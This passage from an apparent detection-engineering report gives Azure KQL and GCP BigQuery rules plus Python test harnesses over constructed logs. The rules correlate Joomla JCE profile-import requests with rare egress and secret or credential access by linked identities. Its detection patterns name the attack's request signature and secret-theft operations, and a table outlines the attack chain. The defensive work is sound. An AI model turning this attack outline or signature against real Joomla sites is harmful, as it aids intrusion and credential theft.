Do not deploy an Azure Activity Log-only version of this rule.
Treat Azure asset mapping, identity mapping, WAF/Application Gateway field validation, endpoint telemetry joins, maintenance-window tuning, identity-to-host mapping, and SOC routing as required local deployment work.
DRI Assessment
Moderate with Azure-hosted Joomla asset mapping and application-layer telemetry. Low for Azure-native control-plane-only telemetry.
DRI
7.6 / 10
TCR Assessment
Moderate operational confidence when Azure logs show suspicious downstream activity. High confidence requires Joomla web, endpoint, and identity correlation linked to the affected host or Joomla identity.
Operational TCR
7.3 / 10
Full-Telemetry TCR
8.8 / 10
Limitations
Azure Activity Logs do not show Joomla request handling, JCE profile import behavior, or local PHP execution. Application-layer and endpoint telemetry are required for production confidence; Azure control-plane, identity, network, or resource activity should not be treated as proof of Joomla/JCE compromise without web, host, workload, identity, file, or time-window correlation. Critical severity requires Joomla-linked identity or host-to-identity correlation, not time proximity alone.
Detection Query Pattern
Azure Monitor / Log Analytics KQL pattern requiring local table, lookup, workload identity, maintenance-window, and field validation:
let JoomlaAssets =
externaldata(
JoomlaSiteId:string,
PrivateIp:string,
Hostname:string,
BackendPool:string,
SubscriptionId:string,
ResourceGroup:string
)
["ENV_AZURE_JOOMLA_JCE_ASSETS_LOOKUP"];
let JoomlaWorkloadIdentities =
externaldata(
JoomlaSiteId:string,
SubscriptionId:string,
Identity:string,
IdentityType:string,
ServiceContext:string
)
["ENV_AZURE_JOOMLA_WORKLOAD_IDENTITY_MAP"];
let ApprovedAdminSources =
externaldata(SourceIp:string)
["ENV_APPROVED_JOOMLA_ADMIN_SOURCES_LOOKUP"];
let ApprovedScanners =
externaldata(SourceIp:string)
["ENV_APPROVED_JOOMLA_SCANNERS_LOOKUP"];
let ApprovedHostingProviderSources =
externaldata(SourceIp:string)
["ENV_APPROVED_HOSTING_PROVIDER_SOURCES_LOOKUP"];
let ApprovedEgress =
externaldata(DestinationIp:string, DestinationDomain:string)
["ENV_APPROVED_JOOMLA_EGRESS_DESTINATIONS_LOOKUP"];
let ApprovedMaintenanceWindows =
externaldata(
JoomlaSiteId:string,
MaintenanceStart:datetime,
MaintenanceEnd:datetime
)
["ENV_APPROVED_AZURE_JOOMLA_MAINTENANCE_WINDOWS_LOOKUP"];
let SuspiciousJceUri =
AzureDiagnostics
// Access log only: ApplicationGatewayFirewallLog carries no HTTP method and names the client field clientIp_s
| where Category == "ApplicationGatewayAccessLog"
| where httpMethod_s == "POST"
// requestUri_s may carry only the path; the JCE parameters live in the query string
| extend FullUri = coalesce(column_ifexists("originalRequestUriWithArgs_s", ""), strcat(requestUri_s, "?", requestQuery_s))
| where FullUri contains "option=com_jce"
| where FullUri contains "task=profiles.import"
| project
UriTime=TimeGenerated,
BackendPool=tostring(backendPoolName_s),
SourceIp=tostring(clientIP_s),
Uri=tostring(FullUri),
Method=tostring(httpMethod_s),
UserAgent=tostring(userAgent_s)
| join kind=inner JoomlaAssets on BackendPool
| join kind=leftouter ApprovedAdminSources on $left.SourceIp == $right.SourceIp
| extend ApprovedAdminSource=SourceIp1
| project-away SourceIp1
| join kind=leftouter ApprovedScanners on $left.SourceIp == $right.SourceIp
| extend ApprovedScannerSource=SourceIp1
| project-away SourceIp1
| join kind=leftouter ApprovedHostingProviderSources on $left.SourceIp == $right.SourceIp
| extend ApprovedHostingProviderSource=SourceIp1
| project-away SourceIp1
| where isempty(ApprovedAdminSource)
and isempty(ApprovedScannerSource)
and isempty(ApprovedHostingProviderSource)
| project
UriTime,
JoomlaSiteId,
Hostname,
PrivateIp,
BackendPool,
SubscriptionId,
ResourceGroup,
SourceIp,
Uri,
Method,
UserAgent;
let RareEgress =
AzureNetworkAnalytics_CL
// Traffic Analytics flow rows: outbound ("O") flows with FlowStatus_s "A" (allowed); "Allowed" is not a value in this table
| where SubType_s == "FlowLog"
| where FlowDirection_s == "O"
| where FlowStatus_s == "A"
| project
EgressTime=TimeGenerated,
PrivateIp=tostring(SrcIP_s),
DestIP=tostring(DestIP_s),
// NSG flow logs carry no destination domain; this is populated only if local enrichment adds one
DestDomain=tostring(column_ifexists("DestDomain_s", "")),
DestPort=tostring(toint(DestPort_d))
| join kind=inner JoomlaAssets on PrivateIp
| where isnotempty(DestIP)
| join kind=leftouter ApprovedEgress on $left.DestIP == $right.DestinationIp
| extend ApprovedEgressIp=DestinationIp
| project-away DestinationIp
| join kind=leftouter ApprovedEgress on $left.DestDomain == $right.DestinationDomain
| extend ApprovedEgressDomain=DestinationDomain
| project-away DestinationDomain
| where isempty(ApprovedEgressIp)
and isempty(ApprovedEgressDomain)
| project
EgressTime,
JoomlaSiteId,
Hostname,
PrivateIp,
SubscriptionId,
DestIP,
DestDomain,
DestPort;
let HighRiskAzureActivity =
union
(
    AzureActivity
    // Control-plane operations only; data-plane reads (secret gets, blob reads) never appear in AzureActivity
    | where OperationNameValue in (
        "MICROSOFT.KEYVAULT/VAULTS/SECRETS/READ",
        "MICROSOFT.KEYVAULT/VAULTS/SECRETS/WRITE",
        "MICROSOFT.KEYVAULT/VAULTS/ACCESSPOLICIES/WRITE",
        "MICROSOFT.STORAGE/STORAGEACCOUNTS/LISTKEYS/ACTION",
        "MICROSOFT.WEB/SITES/CONFIG/WRITE",
        "MICROSOFT.WEB/SITES/WRITE",
        "MICROSOFT.CONTAINERREGISTRY/REGISTRIES/PUSH/WRITE",
        "MICROSOFT.RESOURCES/DEPLOYMENTS/WRITE",
        "MICROSOFT.AUTHORIZATION/ROLEASSIGNMENTS/WRITE"
    )
    | project
        CloudTime=TimeGenerated,
        Identity=tostring(Caller),
        OperationNameValue=tostring(OperationNameValue),
        ActivityStatusValue=tostring(ActivityStatusValue),
        ResourceGroup=tostring(ResourceGroup),
        SubscriptionId=tostring(SubscriptionId),
        ResourceId=tostring(_ResourceId),
        CallerIpAddress=tostring(CallerIpAddress)
),
(
    // Key Vault secret reads are data-plane audit events (Key Vault diagnostic category "AuditEvent")
    AzureDiagnostics
    | where ResourceProvider == "MICROSOFT.KEYVAULT" and Category == "AuditEvent"
    | where OperationName in ("SecretGet", "SecretList", "SecretSet")
    | project
        CloudTime=TimeGenerated,
        // UPN for users, app id or object id for service principals and managed identities
        Identity=coalesce(
            tostring(column_ifexists("identity_claim_upn_s", "")),
            tostring(column_ifexists("identity_claim_appid_g", "")),
            tostring(column_ifexists("identity_claim_oid_g", ""))),
        OperationNameValue=strcat("MICROSOFT.KEYVAULT/AUDITEVENT/", toupper(OperationName)),
        ActivityStatusValue=tostring(ResultType),
        ResourceGroup=tostring(ResourceGroup),
        SubscriptionId=tostring(SubscriptionId),
        ResourceId=tostring(_ResourceId),
        CallerIpAddress=tostring(CallerIPAddress)
)
| join kind=inner JoomlaWorkloadIdentities on Identity
| join kind=leftouter ApprovedMaintenanceWindows on JoomlaSiteId
| where isnull(MaintenanceStart)
or not(CloudTime between (MaintenanceStart .. MaintenanceEnd))
| project
CloudTime,
JoomlaSiteId,
SubscriptionId,
Identity,
IdentityType,
ServiceContext,
OperationNameValue,
ActivityStatusValue,
ResourceGroup,
ResourceId,
CallerIpAddress;
let UriWithRareEgress =
SuspiciousJceUri
| join kind=inner RareEgress on JoomlaSiteId
| where EgressTime between (UriTime .. UriTime + 120m)
| project
UriTime,
JoomlaSiteId,
Hostname,
PrivateIp,
BackendPool,
SubscriptionId,
ResourceGroup,
SourceIp,
Uri,
UserAgent,
EgressTime,
DestIP,
DestDomain,
DestPort,
CloudTime=datetime(null),
Identity="",
IdentityType="",
ServiceContext="",
OperationNameValue="",
ActivityStatusValue="",
ResourceId="",
CallerIpAddress="",
Signal="rare_joomla_egress";
let UriWithHighRiskCloudActivity =
SuspiciousJceUri
| join kind=inner HighRiskAzureActivity on JoomlaSiteId
| where CloudTime between (UriTime .. UriTime + 120m)
| project
UriTime,
JoomlaSiteId,
Hostname,
PrivateIp,
BackendPool,
SubscriptionId,
ResourceGroup,
SourceIp,
Uri,
UserAgent,
EgressTime=datetime(null),
DestIP="",
DestDomain="",
DestPort="",
CloudTime,
Identity,
IdentityType,
ServiceContext,
OperationNameValue,
ActivityStatusValue,
ResourceId,
CallerIpAddress,
Signal="joomla_linked_azure_activity";
union UriWithRareEgress, UriWithHighRiskCloudActivity
| summarize
Signals=make_set(Signal),
DestIPs=make_set(DestIP),
DestDomains=make_set(DestDomain),
DestPorts=make_set(DestPort),
Identities=make_set(Identity),
IdentityTypes=make_set(IdentityType),
ServiceContexts=make_set(ServiceContext),
Operations=make_set(OperationNameValue),
ResourceIds=make_set(ResourceId),
FirstSeen=min(UriTime),
LastSeen=max(coalesce(EgressTime, CloudTime, UriTime))
by JoomlaSiteId, Hostname, PrivateIp, BackendPool, SubscriptionId, ResourceGroup, SourceIp, Uri, UserAgent
| extend Severity=case(
array_length(Signals) > 1, "high",
set_has_element(Signals, "joomla_linked_azure_activity"), "high",
set_has_element(Signals, "rare_joomla_egress"), "medium",
"informational"
)
| extend CyberDaxRule="Joomla JCE Profile Import Followed by Azure Workload or Network Activity"
| project
FirstSeen,
LastSeen,
JoomlaSiteId,
Hostname,
PrivateIp,
BackendPool,
SubscriptionId,
ResourceGroup,
SourceIp,
Uri,
UserAgent,
Severity,
Signals,
DestIPs,
DestDomains,
DestPorts,
Identities,
IdentityTypes,
ServiceContexts,
Operations,
ResourceIds,
CyberDaxRule
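The QRadar offense condition, the AWS Athena pattern and the Azure KQL pattern all perform the same join: an unapproved JCE profile-import request, followed within a window by rare egress from the same Joomla host or high-risk activity by an identity mapped to that site, with approved sources, approved destinations and maintenance windows removed and severity assigned from which signals survive. The following added example, not part of the original report or of any provider's tooling, carries that join out in plain Python over constructed records so the suppression and severity rules can be exercised end to end. The critical tier follows the Detection Logic text (sensitive service access by a Joomla-linked identity outside maintenance), which the queries themselves stop at high. Every lookup table, address, principal and timestamp below is constructed; the window defaults to the cloud patterns' 120 minutes and can be set to the AQL offense's 60.

```python
"""Correlate JCE profile-import requests with rare egress and Joomla-linked identity activity."""
from datetime import datetime, timedelta

SENSITIVE_ACTIONS = {"GetSecretValue", "GetParameter", "GetParameters",
                     "CreateAccessKey", "AttachRolePolicy", "PutRolePolicy"}

# Constructed lookups (stand-ins for the ENV_* tables).
ASSETS = {"10.0.1.10": "site-a"}                     # Joomla host private IP -> joomla_site_id
IDENTITY_PREFIXES = {"site-a": ["arn:aws:sts::123456789012:assumed-role/joomla-web-role/"]}
APPROVED_SOURCES = {"198.51.100.5"}                  # admin, scanner and hosting-provider sources
APPROVED_EGRESS = {"203.0.113.20"}                   # e.g. the update mirror
MAINTENANCE = [("site-a", "2026-06-17T13:00:00", "2026-06-17T14:00:00")]


def ts(value):
    return datetime.fromisoformat(value)


def site_for_identity(principal):
    """Identity-to-site linkage; without it an identity event never counts toward a finding."""
    for site, prefixes in IDENTITY_PREFIXES.items():
        if any(principal.startswith(p) for p in prefixes):
            return site
    return None


def in_maintenance(site, when):
    return any(s == site and ts(start) <= when <= ts(end) for s, start, end in MAINTENANCE)


def is_jce_import(req):
    return (req["verb"] == "POST" and "option=com_jce" in req["url"]
            and "task=profiles.import" in req["url"])


def severity(signals):
    kinds = {s["kind"] for s in signals}
    if any(s["kind"] == "identity" and s["event"] in SENSITIVE_ACTIONS for s in signals):
        return "critical"   # sensitive service access by a Joomla-linked identity, outside maintenance
    if "identity" in kinds:
        return "high"
    if "egress" in kinds:
        return "medium"
    return "informational"


def correlate(requests, flows, audit, window_minutes=120):
    """One finding per unapproved JCE import followed by at least one signal inside the window."""
    window = timedelta(minutes=window_minutes)
    findings = []
    for req in requests:
        if not is_jce_import(req) or req["client_ip"] in APPROVED_SOURCES:
            continue
        site = ASSETS.get(req["target_ip"])
        if site is None:
            continue
        t0 = ts(req["time"])
        t1 = t0 + window
        signals = []
        for f in flows:
            if ASSETS.get(f["src"]) == site and f["dst"] not in APPROVED_EGRESS and t0 <= ts(f["time"]) <= t1:
                signals.append({"kind": "egress", "time": f["time"], "dst": f"{f['dst']}:{f['dport']}"})
        for a in audit:
            when = ts(a["time"])
            if (site_for_identity(a["principal"]) == site and t0 <= when <= t1
                    and not in_maintenance(site, when)):
                signals.append({"kind": "identity", "time": a["time"], "event": a["event"],
                                "principal": a["principal"]})
        if signals:
            findings.append({"site": site, "import_time": req["time"], "client_ip": req["client_ip"],
                             "signals": signals, "severity": severity(signals)})
    return findings


# Constructed records: gateway requests, flow records and identity audit events.
REQUESTS = [
    {"time": "2026-06-17T12:00:00", "client_ip": "192.0.2.77", "target_ip": "10.0.1.10", "verb": "POST",
     "url": "/administrator/index.php?option=com_jce&task=profiles.import"},
    {"time": "2026-06-17T12:05:00", "client_ip": "198.51.100.5", "target_ip": "10.0.1.10", "verb": "POST",
     "url": "/administrator/index.php?option=com_jce&task=profiles.import"},
    {"time": "2026-06-17T12:10:00", "client_ip": "192.0.2.77", "target_ip": "10.0.1.10", "verb": "GET",
     "url": "/index.php"},
]
FLOWS = [
    {"time": "2026-06-17T12:12:00", "src": "10.0.1.10", "dst": "203.0.113.20", "dport": 443},
    {"time": "2026-06-17T12:20:00", "src": "10.0.1.10", "dst": "203.0.113.99", "dport": 4444},
    {"time": "2026-06-17T15:00:00", "src": "10.0.1.10", "dst": "203.0.113.99", "dport": 4444},
]
AUDIT = [
    {"time": "2026-06-17T12:35:00", "event": "GetSecretValue",
     "principal": "arn:aws:sts::123456789012:assumed-role/joomla-web-role/i-0abc"},
    {"time": "2026-06-17T12:40:00", "event": "UpdateStack",
     "principal": "arn:aws:iam::123456789012:user/ci-deployer"},
    {"time": "2026-06-17T13:30:00", "event": "PutObject",
     "principal": "arn:aws:sts::123456789012:assumed-role/joomla-web-role/i-0abc"},
]

if __name__ == "__main__":
    for finding in correlate(REQUESTS, FLOWS, AUDIT):
        print(finding["severity"], finding["site"], finding["import_time"], len(finding["signals"]))
```

Only the first request survives: the second comes from an approved admin source and the third is not a profile import. Of the three flows, one goes to an approved destination and one falls outside the window; of the three audit events, the ci-deployer principal maps to no Joomla site and the PutObject lands inside the maintenance window. What remains is one rare egress plus one secret read by the site's own workload role, which is the identity linkage the report requires before anything is called critical.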
GCP
Detection Viability Assessment
Production-deployable only when Joomla is hosted on GCP and GCP telemetry can be joined with application-layer logs, endpoint telemetry, workload identity, and downstream cloud activity. GCP Audit Logs alone are not sufficient.
Rule
GCP Hosted Joomla JCE Profile Import With Linked Service Account Secret Artifact or Egress Activity
Rule Format
BigQuery / Cloud Logging correlation pattern requiring Joomla asset and identity mapping.
Detection Purpose
Detect GCP-hosted Joomla JCE profile-import activity that aligns with rare egress or Joomla-linked service-account activity involving Secret Manager, Artifact Registry, Cloud Storage, GKE, infrastructure modification, or production resources.
Detection Logic
Trigger when a GCP-hosted Joomla asset shows suspicious JCE profile-import activity and the same VM, GKE workload, private IP, service account, or Joomla-linked identity shows rare egress or high-risk GCP activity within 120 minutes.
Assign medium severity for rare egress from GCP-hosted Joomla assets.
Assign high severity when rare egress or high-risk GCP activity aligns with suspicious JCE profile-import activity on a mapped Joomla asset.
Promote to critical when Joomla-linked service accounts access secrets, alter storage backups, push artifacts, modify GKE workloads, modify production infrastructure, assign IAM policy, or alter production resources outside approved maintenance.
Required Telemetry
Cloud Load Balancing logs.
Cloud Armor logs where applicable.
Web server or reverse-proxy logs.
Compute Engine or GKE asset mapping.
Endpoint telemetry from Joomla workloads.
VPC Flow Logs.
Cloud DNS logs.
Google Cloud Audit Logs.
Secret Manager audit logs.
GKE audit logs where applicable.
Cloud Storage audit logs where applicable.
Artifact Registry logs where applicable.
Approved Joomla service-account lookup.
Approved maintenance-window lookup.
Approved egress-destination lookup.
Approved Joomla asset lookup.
Engineering Implementation Instructions
Map Joomla assets to Compute Engine instances, GKE pods, namespaces, service accounts, private IPs, load-balancer backends, Cloud Armor policies, Artifact Registry repositories, Cloud Storage buckets, Secret Manager secrets, deployment targets, and production projects.
Validate URI visibility through load balancer, ingress, reverse proxy, WAF, or web server logs before enabling high-severity detections.
Create approved Joomla service account, maintenance-window, egress-destination, project, cluster, namespace, secret, registry, storage, asset, and workload lookup tables.
Do not deploy a GCP Audit Log-only version of this rule.
Treat GCP asset mapping, workload identity mapping, URI-log validation, endpoint telemetry joins, maintenance-window tuning, identity-to-host mapping, and SOC routing as required local deployment work.
DRI Assessment
Moderate with GCP-hosted Joomla asset mapping and application-layer telemetry. Low for GCP-native control-plane-only telemetry.
DRI
7.5 / 10
TCR Assessment
Moderate operational confidence when GCP logs show suspicious downstream activity. High confidence requires Joomla web, endpoint, and identity correlation linked to the affected host or Joomla service account.
Operational TCR
7.2 / 10
Full-Telemetry TCR
8.7 / 10
Limitations
GCP Audit Logs do not show Joomla request handling, JCE profile import behavior, or local PHP execution. Application-layer and endpoint telemetry are required for production confidence; GCP audit, network, DNS, or service-account activity should not be treated as proof of Joomla/JCE compromise without web, host, workload, identity, file, or time-window correlation. Critical severity requires Joomla-linked service account or host-to-identity correlation, not time proximity alone.
Detection Query Pattern
BigQuery / Cloud Logging SQL-style pattern requiring local table names, workload identity mapping, maintenance-window enrichment, and field validation:
WITH joomla_assets AS (
SELECT
joomla_site_id,
backend_service_name,
private_ip,
instance_id,
project_id
FROM ENV_GCP_JOOMLA_JCE_ASSETS
),
joomla_workload_identities AS (
SELECT
joomla_site_id,
project_id,
principal_email,
identity_type,
service_context
FROM ENV_GCP_JOOMLA_WORKLOAD_IDENTITY_MAP
),
suspicious_jce_uri AS (
SELECT
lb.timestamp AS event_time,
lb.resource.labels.backend_service_name AS backend_service_name,
lb.httpRequest.remoteIp AS source_ip,
lb.httpRequest.requestMethod AS method,
lb.httpRequest.requestUrl AS request_url,
lb.httpRequest.userAgent AS user_agent,
ja.joomla_site_id,
ja.private_ip,
ja.instance_id,
ja.project_id,
'jce_profile_import' AS signal
FROM ENV_GCP_HTTP_LOAD_BALANCER_LOGS lb
JOIN joomla_assets ja
ON lb.resource.labels.backend_service_name = ja.backend_service_name
LEFT JOIN ENV_APPROVED_JOOMLA_ADMIN_SOURCES admin_src
ON lb.httpRequest.remoteIp = admin_src.source_ip
LEFT JOIN ENV_APPROVED_JOOMLA_SCANNERS scanner_src
ON lb.httpRequest.remoteIp = scanner_src.source_ip
LEFT JOIN ENV_APPROVED_HOSTING_PROVIDER_SOURCES hosting_src
ON lb.httpRequest.remoteIp = hosting_src.source_ip
WHERE lb.httpRequest.requestMethod = 'POST'
AND REGEXP_CONTAINS(lb.httpRequest.requestUrl, r'option=com_jce')
AND REGEXP_CONTAINS(lb.httpRequest.requestUrl, r'task=profiles\.import')
AND admin_src.source_ip IS NULL
AND scanner_src.source_ip IS NULL
AND hosting_src.source_ip IS NULL
),
rare_egress AS (
SELECT
flow.timestamp AS event_time,
flow.jsonPayload.connection.src_ip AS src_ip,
flow.jsonPayload.connection.dest_ip AS dest_ip,
flow.jsonPayload.connection.dest_port AS dest_port,
flow.jsonPayload.disposition AS disposition,
ja.joomla_site_id,
ja.project_id,
'rare_joomla_egress' AS signal
FROM ENV_GCP_VPC_FLOW_LOGS flow
JOIN joomla_assets ja
ON flow.jsonPayload.connection.src_ip = ja.private_ip
LEFT JOIN ENV_APPROVED_JOOMLA_EGRESS_DESTINATIONS approved_egress
ON flow.jsonPayload.connection.dest_ip = approved_egress.dest_ip
-- Field validation: jsonPayload.disposition ('ALLOWED' / 'DENIED') is carried by Firewall Rules Logging entries;
-- VPC Flow Logs carry jsonPayload.connection.* but no disposition, so drop the disposition column and this filter
-- when ENV_GCP_VPC_FLOW_LOGS holds flow logs only.
WHERE flow.jsonPayload.disposition = 'ALLOWED'
AND flow.jsonPayload.connection.dest_ip IS NOT NULL
AND flow.jsonPayload.connection.dest_ip <> ''
AND approved_egress.dest_ip IS NULL
),
audit_candidates AS (
SELECT
audit.timestamp AS event_time,
audit.protoPayload.authenticationInfo.principalEmail AS principal_email,
audit.protoPayload.methodName AS method_name,
audit.resource.labels.project_id AS project_id,
audit.protoPayload.resourceName AS resource_name,
audit.protoPayload.requestMetadata.callerIp AS caller_ip,
audit.protoPayload.serviceName AS service_name
FROM ENV_GCP_AUDIT_LOGS audit
WHERE audit.protoPayload.methodName IN (
'google.cloud.secretmanager.v1.SecretManagerService.AccessSecretVersion',
'storage.objects.get',
'storage.objects.create',
'storage.objects.delete',
'google.devtools.artifactregistry.v1.ArtifactRegistry.UploadAptArtifact',
'google.devtools.artifactregistry.v1.ArtifactRegistry.UploadYumArtifact',
'io.k8s.apps.v1.deployments.update',
'io.k8s.core.v1.secrets.get',
'v1.compute.instances.setMetadata',
'v1.compute.instances.insert',
'v1.compute.firewalls.patch',
'SetIamPolicy'
)
),
high_risk_gcp_activity AS (
SELECT
a.event_time,
a.principal_email,
a.method_name,
a.project_id,
a.resource_name,
a.caller_ip,
a.service_name,
wi.joomla_site_id,
wi.identity_type,
wi.service_context,
'joomla_linked_gcp_activity' AS signal
FROM audit_candidates a
JOIN joomla_workload_identities wi
ON a.project_id = wi.project_id
AND a.principal_email = wi.principal_email
LEFT JOIN ENV_APPROVED_GCP_JOOMLA_MAINTENANCE_WINDOWS mw
ON wi.joomla_site_id = mw.joomla_site_id
AND a.event_time BETWEEN mw.maintenance_start AND mw.maintenance_end
WHERE mw.joomla_site_id IS NULL
),
correlated_activity AS (
SELECT
s.event_time AS uri_time,
s.joomla_site_id,
s.private_ip,
s.instance_id,
s.project_id,
s.source_ip,
s.request_url,
s.user_agent,
e.event_time AS egress_time,
e.dest_ip,
e.dest_port,
c.event_time AS cloud_time,
c.principal_email,
c.identity_type,
c.service_context,
c.method_name,
c.resource_name,
c.caller_ip,
c.service_name,
e.signal AS egress_signal,
c.signal AS cloud_signal
FROM suspicious_jce_uri s
LEFT JOIN rare_egress e
ON s.joomla_site_id = e.joomla_site_id
AND e.event_time BETWEEN s.event_time AND TIMESTAMP_ADD(s.event_time, INTERVAL 120 MINUTE)
LEFT JOIN high_risk_gcp_activity c
ON s.joomla_site_id = c.joomla_site_id
AND c.event_time BETWEEN s.event_time AND TIMESTAMP_ADD(s.event_time, INTERVAL 120 MINUTE)
)
SELECT
uri_time,
joomla_site_id,
private_ip,
instance_id,
project_id,
source_ip,
request_url,
user_agent,
egress_time,
dest_ip,
dest_port,
cloud_time,
principal_email,
identity_type,
service_context,
method_name,
resource_name,
caller_ip,
service_name,
CASE
-- Critical tier from the Detection Logic: a Joomla-linked Google service account (principal ends in
-- gserviceaccount.com) performing high-risk activity outside an approved maintenance window.
WHEN cloud_signal IS NOT NULL AND ENDS_WITH(principal_email, 'gserviceaccount.com') THEN 'critical'
WHEN cloud_signal IS NOT NULL THEN 'high'
WHEN egress_signal IS NOT NULL THEN 'medium'
ELSE 'informational'
END AS severity,
'Joomla JCE Profile Import Followed by GCP Workload or Network Activity' AS cyberdax_rule
FROM correlated_activity
WHERE egress_signal IS NOT NULL
OR cloud_signal IS NOT NULL
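The joins and severity tiers above can be exercised offline before the rule is wired to BigQuery. What follows is an added example, not part of the CyberDax rule or of the report: a Python re-implementation of the same correlation over constructed Cloud Logging entries in the load-balancer, VPC-flow and audit-log field shapes the query reads. The lookup dictionaries stand in for the ENV_* tables, and every site id, IP address, project, principal and maintenance window in them is an assumed value; the critical tier is keyed on the Google service-account address suffix gserviceaccount.com.

```python
import re
from datetime import datetime, timedelta, timezone

WINDOW = timedelta(minutes=120)

# Constructed lookups standing in for the ENV_* tables in the query (assumed values, not a real estate).
JOOMLA_ASSETS = {  # backend_service_name -> Joomla asset
    "joomla-prod-backend": {"site": "site-001", "private_ip": "10.10.0.5", "project": "proj-web"},
}
WORKLOAD_IDENTITIES = {  # (project_id, principal_email) -> joomla_site_id
    ("proj-web", "joomla-web@proj-web.iam.gserviceaccount.com"): "site-001",
    ("proj-web", "webadmin@example.test"): "site-001",
}
APPROVED_SOURCES = {"203.0.113.10"}  # approved admin, scanner and hosting-provider source IPs
APPROVED_EGRESS = {"10.10.0.2"}      # approved destinations, e.g. the internal resolver
MAINTENANCE_WINDOWS = {"site-001": [("2026-06-17T02:00:00Z", "2026-06-17T03:00:00Z")]}
HIGH_RISK_METHODS = {
    "google.cloud.secretmanager.v1.SecretManagerService.AccessSecretVersion",
    "storage.objects.delete", "io.k8s.apps.v1.deployments.update", "SetIamPolicy",
}

def ts(value):
    """Parse the RFC 3339 timestamp Cloud Logging emits into an aware UTC datetime."""
    return datetime.fromisoformat(value.replace("Z", "+00:00")).astimezone(timezone.utc)

def suspicious_profile_imports(lb_logs):
    """Non-allow-listed POSTs to the JCE profile-import task on a mapped backend service."""
    hits = []
    for e in lb_logs:
        req = e["httpRequest"]
        asset = JOOMLA_ASSETS.get(e["resource"]["labels"].get("backend_service_name"))
        url = req.get("requestUrl", "")
        if (asset is None or req.get("requestMethod") != "POST"
                or not re.search(r"option=com_jce", url) or not re.search(r"task=profiles\.import", url)
                or req.get("remoteIp") in APPROVED_SOURCES):
            continue
        hits.append({"time": ts(e["timestamp"]), "site": asset["site"], "source_ip": req["remoteIp"], "url": url})
    return hits

def rare_egress(flow_logs):
    """Flows from a Joomla private IP to a destination that is not on the allow list."""
    ip_to_site = {a["private_ip"]: a["site"] for a in JOOMLA_ASSETS.values()}
    out = []
    for e in flow_logs:
        conn = e["jsonPayload"]["connection"]
        site, dest = ip_to_site.get(conn.get("src_ip")), conn.get("dest_ip")
        if site and dest and dest not in APPROVED_EGRESS:
            out.append({"time": ts(e["timestamp"]), "site": site, "dest_ip": dest, "dest_port": conn.get("dest_port")})
    return out

def in_maintenance(site, when):
    return any(ts(s) <= when <= ts(e) for s, e in MAINTENANCE_WINDOWS.get(site, []))

def high_risk_activity(audit_logs):
    """High-risk audit-log methods by a Joomla-linked identity outside an approved maintenance window."""
    out = []
    for e in audit_logs:
        pp, when = e["protoPayload"], ts(e["timestamp"])
        principal = pp["authenticationInfo"]["principalEmail"]
        site = WORKLOAD_IDENTITIES.get((e["resource"]["labels"]["project_id"], principal))
        if site is None or pp["methodName"] not in HIGH_RISK_METHODS or in_maintenance(site, when):
            continue
        out.append({"time": when, "site": site, "principal": principal,
                    "method": pp["methodName"], "resource": pp.get("resourceName")})
    return out

def severity(egress, cloud):
    """Tiers from the Detection Logic; critical keys on a Google service-account principal."""
    if any(c["principal"].endswith("gserviceaccount.com") for c in cloud):
        return "critical"
    if cloud:
        return "high"
    return "medium" if egress else "informational"

def correlate(lb_logs, flow_logs, audit_logs):
    """Tie each suspicious import to egress and cloud activity on the same site within WINDOW."""
    egress_events, cloud_events = rare_egress(flow_logs), high_risk_activity(audit_logs)
    alerts = []
    for s in suspicious_profile_imports(lb_logs):
        start, end = s["time"], s["time"] + WINDOW
        eg = [x for x in egress_events if x["site"] == s["site"] and start <= x["time"] <= end]
        cl = [x for x in cloud_events if x["site"] == s["site"] and start <= x["time"] <= end]
        if eg or cl:  # as in the query, an import with no downstream signal is not emitted
            alerts.append({"site": s["site"], "source_ip": s["source_ip"], "uri_time": s["time"],
                           "egress": eg, "cloud": cl, "severity": severity(eg, cl)})
    return alerts

# Constructed Cloud Logging entries in the field shapes the query reads (not real traffic).
SAMPLE_LB_LOGS = [
    {"timestamp": "2026-06-17T10:00:00Z", "resource": {"labels": {"backend_service_name": "joomla-prod-backend"}},
     "httpRequest": {"requestMethod": "POST", "remoteIp": "198.51.100.7",
                     "requestUrl": "https://www.example.test/index.php?option=com_jce&task=profiles.import"}},
    {"timestamp": "2026-06-17T10:05:00Z", "resource": {"labels": {"backend_service_name": "joomla-prod-backend"}},
     "httpRequest": {"requestMethod": "POST", "remoteIp": "203.0.113.10",  # approved admin source: suppressed
                     "requestUrl": "https://www.example.test/index.php?option=com_jce&task=profiles.import"}},
]
SAMPLE_FLOW_LOGS = [
    {"timestamp": "2026-06-17T10:20:00Z", "jsonPayload": {"connection": {"src_ip": "10.10.0.5", "dest_ip": "192.0.2.44", "dest_port": 443}}},
    {"timestamp": "2026-06-17T10:21:00Z", "jsonPayload": {"connection": {"src_ip": "10.10.0.5", "dest_ip": "10.10.0.2", "dest_port": 53}}},
]
SAMPLE_AUDIT_LOGS = [
    {"timestamp": "2026-06-17T11:10:00Z", "resource": {"labels": {"project_id": "proj-web"}},
     "protoPayload": {"authenticationInfo": {"principalEmail": "joomla-web@proj-web.iam.gserviceaccount.com"},
                      "methodName": "google.cloud.secretmanager.v1.SecretManagerService.AccessSecretVersion",
                      "resourceName": "projects/proj-web/secrets/joomla-db-password/versions/latest"}},
]
```

Running correlate() on the constructed entries yields one alert for site-001 at critical severity: the unapproved profile-import POST is followed within 120 minutes by egress to an unlisted destination and a Secret Manager access by the site's service account, while the POST from the approved admin source and the flow to the approved resolver are suppressed. The same function returns medium when only the flow log is supplied and nothing at all when neither downstream signal is present, which mirrors the final WHERE clause of the query.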
S26 Threat-to-Rule Traceability
JCE Profile Import Abuse
Covered by NDR / Network Behavioral Analytics, Splunk, Elastic, QRadar, AWS, Azure, and GCP where URI paths, query strings, and Joomla asset identity are available.
Rogue JCE Profile or Executable Upload Policy
Partially covered. Direct coverage requires Joomla administrative audit logs, database inspection, CMS state export, or file-system evidence. Without CMS telemetry, rules infer risk from profile-import request behavior, PHP access, and file/process evidence.
PHP Payload Upload and Web-Accessible Execution
Covered by NDR, Splunk, Elastic, QRadar, SentinelOne, SIGMA, YARA, and cloud-hosted correlation rules where writable-path PHP access, file creation, process execution, or artifact scanning is available.
Web Server Service-Context Execution
Covered by SentinelOne, Splunk, Elastic, QRadar, and SIGMA where process creation, parent process, command-line, and service-user telemetry are available.
Credential-File Access
Covered by SentinelOne, Splunk, Elastic, QRadar, and YARA where configuration.php, backup files, database dumps, environment files, or credential-bearing files are accessed or embedded in suspicious artifacts.
Rare Outbound Communication
Covered by NDR, DNS/proxy, Splunk, Elastic, QRadar, AWS, Azure, and GCP correlations where Joomla host identity and egress telemetry are available.
